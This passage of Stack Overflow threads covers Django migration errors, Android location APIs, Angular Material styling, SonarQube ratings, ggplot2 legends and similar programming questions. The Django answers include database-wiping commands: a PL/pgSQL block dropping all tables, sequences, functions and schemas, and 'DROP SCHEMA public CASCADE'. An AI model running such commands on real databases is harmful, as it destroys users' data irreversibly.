AND pc.relkind='r'
) LOOP
EXECUTE format('DROP TABLE %I.%I;',
r.nspname, r.relname);
END LOOP;
-- sequences
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind='S'
) LOOP
EXECUTE format('DROP SEQUENCE %I.%I;',
r.nspname, r.relname);
END LOOP;
-- extensions (only if necessary; keep them normally)
FOR r IN (SELECT pns.nspname, pe.extname
FROM pg_catalog.pg_extension pe, pg_catalog.pg_namespace pns
WHERE pns.oid=pe.extnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
) LOOP
EXECUTE format('DROP EXTENSION %I;', r.extname);
END LOOP;
-- aggregate functions first (because they depend on other functions)
FOR r IN (SELECT pns.nspname, pp.proname, pp.oid
FROM pg_catalog.pg_proc pp, pg_catalog.pg_namespace pns, pg_catalog.pg_aggregate pagg
WHERE pns.oid=pp.pronamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pagg.aggfnoid=pp.oid
) LOOP
EXECUTE format('DROP AGGREGATE %I.%I(%s);',
r.nspname, r.proname,
pg_get_function_identity_arguments(r.oid));
END LOOP;
-- routines (functions, aggregate functions, procedures, window functions)
IF EXISTS (SELECT * FROM pg_catalog.pg_attribute
WHERE attrelid='pg_catalog.pg_proc'::regclass
AND attname='prokind' -- PostgreSQL 11+
) THEN
q := 'CASE pp.prokind
WHEN ''p'' THEN ''PROCEDURE''
WHEN ''a'' THEN ''AGGREGATE''
ELSE ''FUNCTION''
END';
ELSIF EXISTS (SELECT * FROM pg_catalog.pg_attribute
WHERE attrelid='pg_catalog.pg_proc'::regclass
AND attname='proisagg' -- PostgreSQL ≤10
) THEN
q := 'CASE pp.proisagg
WHEN true THEN ''AGGREGATE''
ELSE ''FUNCTION''
END';
ELSE
q := '''FUNCTION''';
END IF;
FOR r IN EXECUTE 'SELECT pns.nspname, pp.proname, pp.oid, ' || q || ' AS pt
FROM pg_catalog.pg_proc pp, pg_catalog.pg_namespace pns
WHERE pns.oid=pp.pronamespace
AND pns.nspname NOT IN (''information_schema'', ''pg_catalog'', ''pg_toast'')
' LOOP
EXECUTE format('DROP %s %I.%I(%s);', r.pt,
r.nspname, r.proname,
pg_get_function_identity_arguments(r.oid));
END LOOP;
-- nōn-default schemata we own; assume to be run by a not-superuser
FOR r IN (SELECT pns.nspname
FROM pg_catalog.pg_namespace pns, pg_catalog.pg_roles pr
WHERE pr.oid=pns.nspowner
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast', 'public')
AND pr.rolname=current_user
) LOOP
EXECUTE format('DROP SCHEMA %I;', r.nspname);
END LOOP;
-- voilà
RAISE NOTICE 'Database cleared!';
END; $$;
After this you can run the Django migration commands:
python manage.py makemigrations
python manage.py migrate
And that will absolutely work. Thank you.
A: Comment out django.contrib.admin from INSTALLED_APPS and also comment out path('admin/', admin.site.urls), then rerun makemigrations and then migrate. It will solve your issue.
A: These steps can work as well:
*
*Drop your entire database
*Make a new migration
These few steps can solve it for you, and I think it's best when you have multiple contributors to the same project.
A: Since you are using a custom User model, you can first comment out
INSTALLED_APPS = [
...
#'django.contrib.admin',
...
]
in your INSTALLED_APPS setting. And also comment out
urlpatterns = [
# path('admin/', admin.site.urls)
....
....
]
in your base urls.py
Then run
python manage.py migrate.
When done uncomment
'django.contrib.admin'
and
path('admin/', admin.site.urls)
A: How to solve a weird InconsistentMigrationHistory issue in production
The logs looked like it worked fine:
>>> ./manage migrate
====== Migrations =====
Running migrations:
Applying app.0024_xxx... OK
Applying app.0025_yyy... OK
But then
>>> ./manage migrate
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration app.0025_yyy is applied before its dependency app.0024_xxx on database 'default'.
How to solve?
Change dependency of app.0025_yyy.py manually from 0024_xxx to 0023_prior_migration_name
Then:
>>> ./manage.py makemigrations --merge
Created new merge migration /app/src/app/migrations/0026_merge_20220809_1021.py
>>> ./manage.py migrate
Running migrations:
Applying app.0024_xxx... OK
Applying app.0026_merge_20220809_1021... OK
This solves the issue, but if you do not want to commit your changes you can just revert everything by doing:
>>> ./manage.py migrate app 0023
Running migrations:
Rendering model states... DONE
Unapplying app.0026_merge_20220809_1021... OK
Unapplying app.0024_xxx... OK
Unapplying app.0025_yyy... OK
Revert dependency change of 0025_yyy and delete merge migration.
>>> ./manage migrate
====== Migrations =====
Running migrations:
Applying app.0024_xxx... OK
Applying app.0025_yyy... OK
A: In my case, I was also using a custom user. The following steps worked for me.
1 - delete all migrations and database tables (If you have testing data !!!!).
2 - Run migrations for the custom user app.
python manage.py makemigrations customAuth
python manage.py migrate customAuth
3 - Then run migration for the project level.
python manage.py makemigrations
python manage.py migrate
A: First of all, back up your data (copy your db file).
Delete sqlite.db and also the migration folder.
Then run these commands:
./manage.py makemigrations APP_NAME
./manage.py migrate APP_NAME
After deleting the DB file and the migration folder, make sure to write the application name after the migration commands.
A: Okay, before you do anything weird or nuclear, first just drop your database and rebuild it.
If using Postgres:
DROP SCHEMA public CASCADE;
CREATE SCHEMA PUBLIC;
Then just remake your migrations
./manage.py migrate
This is the most basic solution, which will typically clear things up. Don't go remaking the migrations unless absolutely necessary.
| stackoverflow | {
"language": "en",
"length": 3684,
"provenance": "stackexchange_0000F.jsonl.gz:899952",
"question_score": "166",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651760"
} |
c973c08040596881d2e45ae7a4041a5bd485c3a6 | Stackoverflow Stackexchange
Q: Running an Azure WebJob on a timer
If a web job takes longer than the interval between runs, will Azure start a new instance, or will it wait until the job is complete to start it again?
A: It will wait until the job is completed. We can get the answer from TimerTrigger. The following is the relevant snippet from the document:
If your function execution takes longer than the timer interval, another execution won't be triggered until after the current invocation completes. The next execution is scheduled after the current execution completes.
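For context, a minimal sketch of such a timer-triggered WebJobs function (the CRON schedule and names are illustrative; the TimerTrigger attribute comes from the Azure WebJobs Extensions package):
// Runs every 10 minutes; an overlapping run is not started until the
// current invocation completes, per the documentation quoted above
public static void ProcessTimer([TimerTrigger("0 */10 * * * *")] TimerInfo timerInfo, TextWriter log)
{
    log.WriteLine("Timer job fired!");
}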
| stackoverflow | {
"language": "en",
"length": 93,
"provenance": "stackexchange_0000F.jsonl.gz:899958",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651810"
} |
e87de1f4b1362bbcc13f7bcd7bc3919ef1a359a8 | Stackoverflow Stackexchange
Q: template identifier vs decltype in template function parameter type
What do you consider better?
template <typename T> void func(T x,T y) {}
or
template <typename T> void func(T x,decltype(x) y) {}
IMHO, the second form seems preferable because the link between the types of x and y is explicit, and at least when renaming the template identifier things seem less error-prone.
EDIT
The second form lets you call the function with a subtype of the one used for the first parameter, while the first form needs the exact same types. This argument seems slightly better than the previous one.
A: They are semantically different, so it depends on what you want to achieve. The second is more restrictive than the first. Consider:
template <typename T> void func1(T x, decltype(x) y) {}
template <typename T> void func2(T x, T y) {}
func1(2., 4); // converts 4 to double
func2(2., 4); // fails to compile
In SFINAE contexts it can lead to different compile-time behavior (not necessarily a compilation error), and the two options can indirectly compile to different programs.
A: The two forms don't mean exactly the same thing: in the second one, the type of y is non-deduced.
The first one also won't allow implicit conversions (not only subtypes) on one of the arguments, because then it won't be able to unify the expected type (say int) with the type to convert from (say float). See the example on Coliru.
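A short sketch of what non-deduced means in practice here (an illustration, not from either answer): only x participates in deducing T, so a mixed call is resolved by converting y rather than by a deduction failure:
#include <iostream>

template <typename T> void func1(T x, decltype(x) y) { std::cout << x + y << '\n'; }
template <typename T> void func2(T x, T y) { std::cout << x + y << '\n'; }

int main() {
    func1(2.5, 4);   // T = double from x alone; 4 converts to 4.0 -> prints 6.5
    func1(4, 2.5);   // T = int from x; 2.5 converts to 2 -> prints 6
    // func2(2.5, 4); // error: T deduced as both double and int
}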
| stackoverflow | {
"language": "en",
"length": 232,
"provenance": "stackexchange_0000F.jsonl.gz:899976",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651860"
} |
180f44c489b145cbc2d8ccc9fa8c71c20d618ef5 | Stackoverflow Stackexchange
Q: Cannot Resolve Symbol: FusedLocationProviderClient
Cannot Resolve Symbol: FusedLocationProviderClient.
Google Play services version used: 11.0.1.
Code, at the declaration:
private FusedLocationProviderClient mfusedLocationProviderclient;
A: Import the following lines in your code after you have changed build.gradle (Module: app) to include the implementation line:
"com.google.android.gms:play-services-location:11.0.1"
import com.google.android.gms.location.FusedLocationProviderClient;
import com.google.android.gms.location.LocationServices;
A: This Developer Guide solved my problem
A: You just need to include this in your build.gradle file:
compile 'com.google.android.gms:play-services-location:12.0.1'
Code to retrieve the location:
FusedLocationProviderClient mFusedLocationClient = LocationServices.getFusedLocationProviderClient(this);
mFusedLocationClient.getLastLocation()
.addOnSuccessListener(this, new OnSuccessListener<Location>() {
@Override
public void onSuccess(Location location) {
// Got last known location. In some rare situations this can be null.
}
})
.addOnFailureListener(this, new OnFailureListener() {
@Override
public void onFailure(@NonNull Exception e) {
}
});
A: In build.gradle (Module: app) add:
dependencies {
...
implementation 'com.google.android.gms:play-services-location:17.0.0'
...
}
Don't forget to sync the build.gradle (in the upper-right corner of the build.gradle you will have a notification to sync the changes; click it).
A: In my case, I should include
com.google.android.gms:play-services-location:11.4.0
Not just play-services-maps:11.4.0.
A: Add the coarse location permission in the AndroidManifest.xml file:
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
Then it automatically detects the class and imports it.
A: You just need to include this in your build.gradle file:
implementation "com.google.android.gms:play-services-location:15.0.1"
or if you're not using latest gradle version:
compile "com.google.android.gms:play-services-location:15.0.1"
Note: It's recommended to use Google Play services version 15.0.1 or higher, which includes bug fixes for this class. More details here.
https://developers.google.com/android/reference/com/google/android/gms/location/FusedLocationProviderClient
A: In your build.gradle (Module: app), you need to add the following dependency:
dependencies {
//...
compile 'com.google.android.gms:play-services:11.0.0'
}
and rebuild your app so it can download the needed dependencies. The class FusedLocationProviderClient is included in this package.
A: I know it is very late, but happy to answer the question.
Use this dependencies
compile 'com.google.android.gms:play-services-location:11.0.4'
and refer this link - https://guides.codepath.com/android/Retrieving-Location-with-LocationServices-API
A: You just need to include this in your build.gradle file:
compile 'com.google.android.gms:play-services-location:11.0.2'
The versions of the services for location and maps should be the same.
compile 'com.google.android.gms:play-services-maps:11.0.2'
A: Update your Google Play services to 11.8.0.
The code that should be added to the build file is as follows:
compile 'com.google.android.gms:play-services-gcm:11.8.0'
A: As everyone replied, you need to put this line into your build.gradle file:
implementation 'com.google.android.gms:play-services-location:11.0.1'
(substituting implementation for compile depending on your Gradle version)
The version just needs to be above 11.0.1, apparently.
However, when I did this I had a new error. Since I was already implementing the Play Services libraries (analytics, auth, maps, location) at a previous version (10.0.1), I had to change these all to the new version - you can't have only one of the libraries at a different version; they all need to match.
So I found the lines implementing these libraries and changed them to:
implementation group: 'com.google.android.gms', name: 'play-services-analytics', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-auth', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-maps', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-location', version: '11.0.1'
Since I was also implementing Firebase (not even sure what this is for and why it is related to Play Services), I had to do a similar thing:
implementation group: 'com.google.firebase', name: 'firebase-core', version: '11.0.1'
implementation group: 'com.google.firebase', name: 'firebase-crash', version: '11.0.1'
Sync your project with gradle files and your FusedLocationProviderClient should be visible/available, starting at the import:
import com.google.android.gms.location.FusedLocationProviderClient;
| stackoverflow | {
"language": "en",
"length": 532,
"provenance": "stackexchange_0000F.jsonl.gz:899990",
"question_score": "85",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651889"
} |
02c3781b0cb83858d75610aec9fd3db8a9f1a361 | Stackoverflow Stackexchange
Q: Launching speech preferences pane on macOS Sierra Is it possible to launch the preferences pane with Accessibility/Speech open on macOS Sierra? For accessibility I am aware you can do that with x-apple.systempreferences:com.apple.preference.universalaccess. I am also aware that most tabs in the Accessibility pane can be opened when launched, but there is no documentation on whether this is possible for the Speech tab on Sierra. This is the most comprehensive link I have found thus far: https://macosxautomation.com/system-prefs-links.html, but it predates Sierra and speech belonged to a different pane then, so it is listed but that link isn't useful.
A: You're looking for x-apple.systempreferences:com.apple.preference.universalaccess?TextToSpeech
The anchors for the pane can be retrieved by opening it and then querying the app with AppleScript:
tell application "System Preferences" to get anchors of current pane
Which returns:
"Keyboard"
"Dwell"
"Captioning"
"Seeing_VoiceOver"
"SpeakableItems"
"TextToSpeech"
"Hearing"
"Switch"
"General"
"Media_Descriptions"
"Mouse"
"Seeing_Display"
"Seeing_Zoom"
| Q: Launching speech preferences pane on macOS Sierra Is it possible to launch the preferences pane with Accessibility/Speech open on macOS Sierra? For accessibility I am aware you can do that with x-apple.systempreferences:com.apple.preference.universalaccess. I am also aware that most tabs in the Accessibility pane can be opened when launched, but there is no documentation on whether this is possible for the Speech tab on Sierra. This is the most comprehensive link I have found thus far: https://macosxautomation.com/system-prefs-links.html, but it predates Sierra and speech belonged to a different pane then, so it is listed but that link isn't useful.
A: You're looking for x-apple.systempreferences:com.apple.preference.universalaccess?TextToSpeech
The anchors for the pane can be retrieved by opening it and then querying the app with AppleScript:
tell application "System Preferences" to get anchors of current pane
Which returns:
"Keyboard"
"Dwell"
"Captioning"
"Seeing_VoiceOver"
"SpeakableItems"
"TextToSpeech"
"Hearing"
"Switch"
"General"
"Media_Descriptions"
"Mouse"
"Seeing_Display"
"Seeing_Zoom"
A: https://support.apple.com/kb/PH25806?viewlocale=en_US&locale=en_US, with title
macOS Sierra: Speech pane of Accessibility System Preferences
indicates that the speech pane is still there.
Use the Speech pane of Accessibility System Preferences to customize the system voice, be notified when an alert or app needs your attention, and set a shortcut to speak selected text.
To open this pane, choose Apple menu > System Preferences, click Accessibility, then click Speech.
| stackoverflow | {
"language": "en",
"length": 208,
"provenance": "stackexchange_0000F.jsonl.gz:899991",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651894"
} |
f4fe37f2b1d27a23ef7b07b61aa42cd43727d532 | Stackoverflow Stackexchange
Q: Remove uploaded images rails 4 carrierwave Trying to remove uploaded images using carrierwave
<%= f.fields_for :images do |ff| %>
<div class="form-group">
<label>
<%= ff.check_box :remove_image %>
<%= image_tag ff.object.image %>
</label>
</div>
<% end %>
Getting such params in controller
"images_attributes"=>{"0"=>{"remove_image"=>"0", "id"=>"13"}, "1"=>{"remove_image"=>"1", "id"=>"14"}, "2"=>{"remove_image"=>"0", "id"=>"15"}, "3"=>{"remove_image"=>"0", "id"=>"16"}, "4"=>{"remove_image"=>"0", "id"=>"17"}, "5"=>{"remove_image"=>"0", "id"=>"18"}}}
But when updating an object with these params, nothing happens. What am I missing?
update
def update
@country = Country.find(params[:id])
if @country.update(country_params)
flash[:notice] = 'Country is successfully updated.'
redirect_to edit_admin_country_path
else
flash[:error] = @country.errors.full_messages[0]
render 'edit'
end
end
def country_params
permitted = [{images_attributes: ["image", "@original_filename", "@content_type", "@headers", "_destroy", "id", "remove_image"]}]
params.require(:country).permit(*permitted)
end
class Country < ActiveRecord::Base
has_many :images
....
end
class Image < ActiveRecord::Base
mount_uploader :image, ImageUploader
belongs_to :country
end
A: Your form looks good, but you are missing the controller action.
mine looks like:
class ImageController < ApplicationController
...
def update
@image = Image.find(params[:id])
...
if params[:images][:remove_image].present?
@image.remove_image!
end
@image.save
end
end
If you want to remove the file manually, you can call the generated remove_<mounted>! method (remove_image! here; remove_avatar! in CarrierWave's docs), then save the object.
| Q: Remove uploaded images rails 4 carrierwave Trying to remove uploaded images using carrierwave
<%= f.fields_for :images do |ff| %>
<div class="form-group">
<label>
<%= ff.check_box :remove_image %>
<%= image_tag ff.object.image %>
</label>
</div>
<% end %>
Getting such params in controller
"images_attributes"=>{"0"=>{"remove_image"=>"0", "id"=>"13"}, "1"=>{"remove_image"=>"1", "id"=>"14"}, "2"=>{"remove_image"=>"0", "id"=>"15"}, "3"=>{"remove_image"=>"0", "id"=>"16"}, "4"=>{"remove_image"=>"0", "id"=>"17"}, "5"=>{"remove_image"=>"0", "id"=>"18"}}}
But when updating an object with these params, nothing happens. What am I missing?
update
def update
@country = Country.find(params[:id])
if @country.update(country_params)
flash[:notice] = 'Country is successfully updated.'
redirect_to edit_admin_country_path
else
flash[:error] = @country.errors.full_messages[0]
render 'edit'
end
end
def country_params
permitted = [{images_attributes: ["image", "@original_filename", "@content_type", "@headers", "_destroy", "id", "remove_image"]}]
params.require(:country).permit(*permitted)
end
class Country < ActiveRecord::Base
has_many :images
....
end
class Image < ActiveRecord::Base
mount_uploader :image, ImageUploader
belongs_to :country
end
A: Your form looks good, but you are missing the controller action.
mine looks like:
class ImageController < ApplicationController
...
def update
@image = Image.find(params[:id])
...
if params[:images][:remove_image].present?
@image.remove_image!
end
@image.save
end
end
If you want to remove the file manually, you can call the generated remove_<mounted>! method (remove_image! here; remove_avatar! in CarrierWave's docs), then save the object.
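One likely missing piece (an assumption, since the model code above doesn't show it): for images_attributes to be applied through @country.update at all, the parent model needs nested attributes enabled:
class Country < ActiveRecord::Base
  has_many :images
  # required so update(country_params) walks into images_attributes;
  # allow_destroy also activates the _destroy flag already permitted above
  accepts_nested_attributes_for :images, allow_destroy: true
end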
| stackoverflow | {
"language": "en",
"length": 172,
"provenance": "stackexchange_0000F.jsonl.gz:900015",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651969"
} |
14bf6d0179e4ac8fe9e6cccaa14548d28d9d1a88 | Stackoverflow Stackexchange
Q: Adding legend to geom_rect in R ggplot2 Consider a dataset as in this question. A shading can be plotted using geom_rect in ggplot2 as follows.
data <- structure(list(Time = c(20L, 40L, 60L, 80L, 100L, 120L, 20L,
40L, 60L, 80L, 100L), Average = c(5.8, 6.1, 6.4, 6.7, 7, 7.7,
8.47, 9.317, 10.2487, 11.27357, 12.40093), Test = structure(c(2L,
2L, 2L, 2L, 2L, 2L, 1L, 1L, 1L, 1L, 1L), .Label = c("Control",
"Exp"), class = "factor"), n = c(9L, 9L, 9L, 9L, 9L, 9L, 9L,
9L, 9L, 9L, 9L), se = c(0.12, 0.145, 0.188, 0.99, 0.44, 0.32,
0.5, 0.88, 0.9, 0.33, 0.456)), .Names = c("Time", "Average",
"Test", "n", "se"), class = "data.frame", row.names = c("1",
"2", "3", "4", "5", "6", "7", "8", "9", "10", "11")
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf),fill="pink",colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point()
How to add a legend for the shading?
A: We can insert the fill inside the aes and give it a scale:
library(ggplot2)
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf,fill="What"),colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point() +
scale_fill_manual('Highlight this',
values = 'pink',
guide = guide_legend(override.aes = list(alpha = 1)))
| Q: Adding legend to geom_rect in R ggplot2 Consider a dataset as in this question. A shading can be plotted using geom_rect in ggplot2 as follows.
data <- structure(list(Time = c(20L, 40L, 60L, 80L, 100L, 120L, 20L,
40L, 60L, 80L, 100L), Average = c(5.8, 6.1, 6.4, 6.7, 7, 7.7,
8.47, 9.317, 10.2487, 11.27357, 12.40093), Test = structure(c(2L,
2L, 2L, 2L, 2L, 2L, 1L, 1L, 1L, 1L, 1L), .Label = c("Control",
"Exp"), class = "factor"), n = c(9L, 9L, 9L, 9L, 9L, 9L, 9L,
9L, 9L, 9L, 9L), se = c(0.12, 0.145, 0.188, 0.99, 0.44, 0.32,
0.5, 0.88, 0.9, 0.33, 0.456)), .Names = c("Time", "Average",
"Test", "n", "se"), class = "data.frame", row.names = c("1",
"2", "3", "4", "5", "6", "7", "8", "9", "10", "11")
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf),fill="pink",colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point()
How to add a legend for the shading?
A: We can insert the fill inside the aes and give it a scale:
library(ggplot2)
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf,fill="What"),colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point() +
scale_fill_manual('Highlight this',
values = 'pink',
guide = guide_legend(override.aes = list(alpha = 1)))
| stackoverflow | {
"language": "en",
"length": 188,
"provenance": "stackexchange_0000F.jsonl.gz:900108",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652257"
} |
cb8148f98333691b70a49cccb2ff96ae147a8d89 | Stackoverflow Stackexchange
Q: Manipulating Angular Material Input Form Styling I am new to Angular and Angular Material (AM). By default, AM Input Component shows the primary color of your palette until you click on the form, where then it changes the placeholder value and marker line to the accent color. Is there a way to manipulate the form so that the accent color is always showing? In other words, the form will always be highlighted. The issue is that my primary color is dark, and my website page background is also dark, therefore, the placeholder and marker line are barely visible unless the form is clicked on by the user. This would also be a nice color addition to my site's page.
Here is the sample of the required html from the AM docs:
<md-input-container>
<input mdInput placeholder="Favorite food" value="Sushi">
</md-input-container>
You can add color="accent" to the input line, but again, the color only appears when the form is clicked on by the user.
Thank you in advance.
A: You can add following in your component's css file:
/deep/ .mat-input-underline {
background-color: #FF0000; /* replace this color with your accent color hex code */
}
demo
| Q: Manipulating Angular Material Input Form Styling I am new to Angular and Angular Material (AM). By default, AM Input Component shows the primary color of your palette until you click on the form, where then it changes the placeholder value and marker line to the accent color. Is there a way to manipulate the form so that the accent color is always showing? In other words, the form will always be highlighted. The issue is that my primary color is dark, and my website page background is also dark, therefore, the placeholder and marker line are barely visible unless the form is clicked on by the user. This would also be a nice color addition to my site's page.
Here is the sample of the required html from the AM docs:
<md-input-container>
<input mdInput placeholder="Favorite food" value="Sushi">
</md-input-container>
You can add color="accent" to the input line, but again, the color only appears when the form is clicked on by the user.
Thank you in advance.
A: You can add following in your component's css file:
/deep/ .mat-input-underline {
background-color: #FF0000; /* replace this color with your accent color hex code */
}
demo
A: Every HTML element generated from an Angular Material component gets a mat- CSS class assigned to it. They can be used for styling.
The input component as you are talking about has some nested elements, so you have to decide where you want to apply your styling.
To set styling to the whole input wrapper use:
.mat-input-wrapper {
background: gray;
}
Inspect the generated html to see classes for the more nested elements - such as mat-input-element
A: You can use the css selector you use below:
/deep/ .mat-input-underline {
background-color: white;
}
The /deep/ combinator is slated for deprecation in Angular, so it's best to do without it. Unfortunately, the .mat-input-underline from Angular Material has very high specificity, which makes it very difficult to override without using /deep/.
The best way I have found is to use an ID, which allows you a higher specificity compared to the default Angular Material styles.
<form id="food-form" [formGroup]="form" (ngSubmit)="submit()">
<mat-input-container>
<input matInput placeholder="Favorite food" value="Sushi">
</mat-input-container>
Then, your 'food-form' id can be used to target this form in the global.scss file. It can't be targeted from the component.scss without breaking your view encapsulation. If you don't use /deep/ the .mat-form-field-underline has to be changed at the global level. The ripple is the color used when selecting the input.
#food-form {
.mat-form-field-underline {
background-color: $accent;
}
.mat-form-field-ripple {
background-color: $accent;
}
}
I hope the Angular Material team pulls back their specificity in the future because currently there's no easy way to override their defaults.
A: I had a similar problem adjusting the width of my form field. When investigating, I found that the answer referencing Nehal's answer is correct, but also deprecated in the latest version, 5.0.0-rcX (https://angular.io/guide/component-styles). I continued to double-check my CSS selectors but found I needed to change the ViewEncapsulation.
What worked for me was in my css/scss file (of course modify with your own selectors as needed):
mat-input-container {
// Your CSS here
}
And in my components ts file:
@Component({
selector: 'my-component-selector',
templateUrl: './my-component.component.html',
styleUrls: ['./my-component.component.scss'],
encapsulation: ViewEncapsulation.None
})
Without changing the encapsulation, the CSS selector would not get applied.
Good luck!
A: The above solutions didn't work for me... I understand that Angular Material changes its class names and styles often. I had to do this in my global style.css:
.mat-form-field-underline {
background-color: rgb(177, 140, 81) !important;
}
.mat-form-field-underline.mat-disabled {
background-color: transparent !important;
}
A: CSS
input[class~="bg-transparente"] {
background-color: transparent;
}
and in your input, do this
HTML
<input matInput class="bg-transparente">
| stackoverflow | {
"language": "en",
"length": 610,
"provenance": "stackexchange_0000F.jsonl.gz:900174",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652449"
} |
39fd01b85f3318e0e93f73238ed1cf1593f2f529 | Stackoverflow Stackexchange
Q: How SonarQube A, B, C, D and E Ratings Are Calculated? On the Project Dashboard you see the below on different attributes.
"D"
Security Rating on New Code
is worse than A
"C"
Reliability Rating on New Code
is worse than A
Do we have the measurement criteria documented?
A: Documented? Why, yes. Yes they are: https://docs.sonarqube.org/latest/user-guide/metric-definitions/
Specifically, Security and Reliability ratings are based on the severity of the worst open issue in that domain:
*
*E - Blocker
*D - Critical
*C - Major
*B - Minor
*A - Info or no open issues
For Maintainability the rating is based on the ratio of the estimated time to fix all open Maintainability issues to the development time implied by the size of the code base:
*
*<=5% of the time that has already gone into the application, the rating is A
*between 6% and 10%, the rating is a B
*between 11% and 20%, the rating is a C
*between 21% and 50%, the rating is a D
*anything over 50% is an E
The size of the code base is converted into a development cost from its number of lines, where the cost to develop a line of code is valued at 0.06 days.
| Q: How SonarQube A, B, C, D and E Ratings Are Calculated? On the Project Dashboard you see the below on different attributes.
"D"
Security Rating on New Code
is worse than A
"C"
Reliability Rating on New Code
is worse than A
Do we have the measurement criteria documented?
A: Documented? Why, yes. Yes they are: https://docs.sonarqube.org/latest/user-guide/metric-definitions/
Specifically, Security and Reliability ratings are based on the severity of the worst open issue in that domain:
*
*E - Blocker
*D - Critical
*C - Major
*B - Minor
*A - Info or no open issues
For Maintainability the rating is based on the ratio of the estimated time to fix all open Maintainability issues to the development time implied by the size of the code base:
*
*<=5% of the time that has already gone into the application, the rating is A
*between 6% and 10%, the rating is a B
*between 11% and 20%, the rating is a C
*between 21% and 50%, the rating is a D
*anything over 50% is an E
The size of the code base is converted into a development cost from its number of lines, where the cost to develop a line of code is valued at 0.06 days.
A: The rating for Maintainability is calculated from the ratio between the time estimated to fix the open issues and the codebase size.
The thresholds are configurable under General Settings -> Technical Debt -> Maintainability Rating Grid (Default: 0.05,0.1,0.2,0.5)
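As a worked example using the defaults above: a 10,000-line project has an implied development cost of 10,000 × 0.06 = 600 days; if fixing all open Maintainability issues is estimated at 50 days, the debt ratio is 50 / 600 ≈ 8.3%, which falls in the 6-10% band and yields a B rating.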
| stackoverflow | {
"language": "en",
"length": 231,
"provenance": "stackexchange_0000F.jsonl.gz:900195",
"question_score": "15",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652526"
} |
eb643c3c018feae8aa97303b4b7a4168e19f7f88 | Stackoverflow Stackexchange
Q: USQL Job failing due to exceeding the path length limit I am running my jobs locally using the Local SDK. However, I get the following error message:
Error : 'System.IO.PathTooLongException: The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name must be less than 248 characters.
One of my colleagues was able to track down the error to the .ss file in the catalog folder inside DataRoot by running the project in a new directory in C:\. The path for the .ss file is
C:\HelloWorld\Main\Source\Data\Insights\NewProject\NewProject\USQLJobsForTesting.Tests\bin\Debug\DataRoot\_catalog_\database\d92bfaa5-dc7f-4131-abdc-22c50eb0d8c0\schema\f6cf4417-e2d8-4769-b633-4fb5dddcb066\table\aa136daf-9e86-4650-9cc3-119d607fb3b0\31a18033-099e-4c2a-aae3-75cf099b0fb1.ss
which exceeds the allowed limit of 260 characters. I cannot reduce the length of my project path because my organization follows a certain working directory format.
Is there any possible solution for this problem?
A: Try using subst in CMD to work around this problem by mapping a drive letter to the data root you want to use.
subst X: C:\PathToYourDataRoot
And then in ADL Tools for Visual Studio set the DataRoot to X:
| Q: USQL Job failing due to exceeding the path length limit I am running my jobs locally using the Local SDK. However, I get the following error message:
Error : 'System.IO.PathTooLongException: The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name must be less than 248 characters.
One of my colleagues was able to track down the error to the .ss file in the catalog folder inside DataRoot by running the project in a new directory in C:\. The path for the .ss file is
C:\HelloWorld\Main\Source\Data\Insights\NewProject\NewProject\USQLJobsForTesting.Tests\bin\Debug\DataRoot\_catalog_\database\d92bfaa5-dc7f-4131-abdc-22c50eb0d8c0\schema\f6cf4417-e2d8-4769-b633-4fb5dddcb066\table\aa136daf-9e86-4650-9cc3-119d607fb3b0\31a18033-099e-4c2a-aae3-75cf099b0fb1.ss
which exceeds the allowed limit of 260 characters. I cannot reduce the length of my project path because my organization follows a certain working directory format.
Is there any possible solution for this problem?
A: Try using subst in CMD to work around this problem by mapping a drive letter to the data root you want to use.
subst X: C:\PathToYourDataRoot
And then in ADL Tools for Visual Studio set the DataRoot to X:
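When you are finished, the mapping can be removed again with:
subst X: /D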
| stackoverflow | {
"language": "en",
"length": 174,
"provenance": "stackexchange_0000F.jsonl.gz:900220",
"question_score": "4",
